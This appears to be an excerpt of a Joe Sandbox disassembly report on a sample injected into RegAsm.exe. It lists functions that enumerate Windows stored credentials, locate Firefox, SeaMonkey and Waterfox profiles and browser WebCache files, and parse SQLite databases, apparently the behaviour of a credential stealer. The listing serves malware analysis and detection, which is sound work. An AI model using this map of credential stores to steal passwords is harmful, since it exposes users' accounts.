                                                                • String ID: BIN
                                                                • API String ID: 1668488027-1015027815
                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                • wcsncmp.MSVCRT ref: 0040BE38
                                                                • memset.MSVCRT ref: 0040BE91
                                                                • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                • String ID:
                                                                • API String ID: 697348961-0
                                                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 00403CBF
                                                                • memset.MSVCRT ref: 00403CD4
                                                                • memset.MSVCRT ref: 00403CE9
                                                                • memset.MSVCRT ref: 00403CFE
                                                                • memset.MSVCRT ref: 00403D13
                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                • memset.MSVCRT ref: 00403DDA
                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                • API String ID: 1829478387-11920434
                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 00403E50
                                                                • memset.MSVCRT ref: 00403E65
                                                                • memset.MSVCRT ref: 00403E7A
                                                                • memset.MSVCRT ref: 00403E8F
                                                                • memset.MSVCRT ref: 00403EA4
                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                • memset.MSVCRT ref: 00403F6B
                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                • API String ID: 1829478387-2068335096
                                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 00403FE1
                                                                • memset.MSVCRT ref: 00403FF6
                                                                • memset.MSVCRT ref: 0040400B
                                                                • memset.MSVCRT ref: 00404020
                                                                • memset.MSVCRT ref: 00404035
                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                • memset.MSVCRT ref: 004040FC
                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                • API String ID: 1829478387-3369679110
                                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy
                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                • API String ID: 3510742995-2641926074
                                                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                • free.MSVCRT ref: 0041848B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CreateErrorFileLastfree
                                                                • String ID: |A
                                                                • API String ID: 981974120-1717621600
                                                                • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                • memset.MSVCRT ref: 004033B7
                                                                • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                • String ID: $0.@
                                                                • API String ID: 2758756878-1896041820
                                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 2941347001-0
                                                                • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 00403C09
                                                                • memset.MSVCRT ref: 00403C1E
                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                • wcscat.MSVCRT ref: 00403C47
                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • wcscat.MSVCRT ref: 00403C70
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memsetwcscat$wcscpywcslen
                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                • API String ID: 2489821370-1174173950
                                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 0040A824
                                                                • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • wcscpy.MSVCRT ref: 0040A854
                                                                • wcscat.MSVCRT ref: 0040A86A
                                                                • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 669240632-0
                                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • wcschr.MSVCRT ref: 00414458
                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                • String ID: "%s"
                                                                • API String ID: 1343145685-3297466227
                                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                • API String ID: 1714573020-3385500049
                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 004087D6
                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                • memset.MSVCRT ref: 00408828
                                                                • memset.MSVCRT ref: 00408840
                                                                • memset.MSVCRT ref: 00408858
                                                                • memset.MSVCRT ref: 00408870
                                                                • memset.MSVCRT ref: 00408888
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                • String ID:
                                                                • API String ID: 2911713577-0
                                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcmp
                                                                • String ID: @ $SQLite format 3
                                                                • API String ID: 1475443563-3708268960
                                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _wcsicmpqsort
                                                                • String ID: /nosort$/sort
                                                                • API String ID: 1579243037-1578091866
                                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 0040E60F
                                                                • memset.MSVCRT ref: 0040E629
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                Strings
                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                • API String ID: 3354267031-2114579845
                                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Resource$FindLoadLockSizeof
                                                                • String ID:
                                                                • API String ID: 3473537107-0
                                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
